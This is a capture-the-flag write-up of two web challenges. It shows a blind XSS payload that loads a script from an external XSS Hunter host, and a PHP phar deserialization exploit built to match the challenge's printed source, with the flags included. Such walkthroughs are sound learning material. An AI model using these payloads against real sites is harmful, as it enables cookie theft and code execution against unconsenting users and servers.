Portal
We are provided with a user registration form so lets, register an account
Completing the registration and logging in we have fields for an e-mail address and text
Now, let's submit some random text.
After submission, we got,
The message was: Thank you! Admin will review the message soon. So admin will review our message so we have to do something or exploit something at there lvl so as soon as they get our message something must happen to get our flag and the first thing that came into my mind was to try a blind xss. so fired up my
— XSSHunter copied a simple payload
”><script src=https://logan47.xss.ht></script>
Waited for some time to get the response and to my surprise, this was it I got a response in my xsshunter
In which there lies the flag.
Flag: CSACTF{blu3_1s_such_4_l4zy_sys_4dm1n!}
Huzzah
In this challenge, we are provided with a link and source code of the huzzah.php opening that will give something like this
And source code of huzzah.php was-
tbh I didn’t give much attention to the source code for now. Lets to the main site we are provided with file upload functionality and let's upload something to see what will be happening. Uploaded a random image and got this result.
Hence the thing we got from this is: the file name must be magic.phar. so, it must be related to .phar files
** as it was worth 400+ point the time I solved it so I didn’t even try to simply rename a file as magic.phar and upload it, you know..... **
Now here’s the whole cake, I searched about php .phar related exploits and came across this link it didn’t yield anything but gave me an idea about how I can solve this from this blog posts references I came across these 2 links also
1. A blackhat research paper about php & phar
2.https://blog.ripstech.com/2018/new-php-exploitation-technique/
In the blackhat talk, it was mentioned that there is unserialization vuln. To exploit it, we have to upload malicious magic.phar file and upon deserialization I have to get the flag. In this, they have provided the way how someone can exploit this by running a code something like this and creating a phar file
// create new Phar $phar = new Phar(’test.phar’);$phar->startBuffering();$phar->addFromString(’test.txt’, 'text’);$phar->setStub(’<?php __HALT_COMPILER(); ? >’);// add an object of any class as metadata. class AnyClass {} $object = new AnyClass;$object->data = 'rips’;$phar->setMetadata($object);$phar->stopBuffering();
Here the source code will come into play ... according to which we have to modify our payload and create our magic.phar .
In the source code:
class Magic { function __destruct() { $a = $this->data;if (strstr($a, ";") !== false or strstr($a, "&") !== false) { echo("<p>[-] That’s bad, don’t do that" . "</p><br>");} elseif (strcmp($a, "flag.txt") === 0) { echo("<p>[+] Attempting a magic trick!" . "</p><br>");include($a);//eval($this->data . ";");} else { echo("<p>[-] You gave bad input - " . $a . "</p><br>");} system("rm uploads/magic.phar");} }
In the source code there was a class named Magic so we have to change that in our payload and also $object->data = 'flag.txt’; so the final payload i created was something like
<?php $phar = new Phar(’magic.phar’);$phar->startBuffering();$phar->addFromString(’flag.txt’, 'text’);$phar->setStub(’<?php __HALT_COMPILER();? >’);class Magic {} $object = new Magic;$object->data = 'flag.txt’;$phar->setMetadata($object);$phar->stopBuffering(); ?>
Now we have to save this code inside a php file and run it through a php interpreter BUT -- PHP by default blocks you from creating a phar file from the command line -- so simply running php test.php will give an error like
So, I searched about it and found out a way to run our interpreter as phar.readonly = off, by running
php -d phar.readonly=0 test.php
we will receive our magic.phar so lets now upload the magic.phar after uploading
We just have to go to huzzah.php and let the phar do his work we just have to click on the huzzah on the main page as it was the link to the huzzah.php
In that page, we got our flag.
flag : CSACTF{php_1s_full_0f_m@g1c}
Write-up by @logan_47_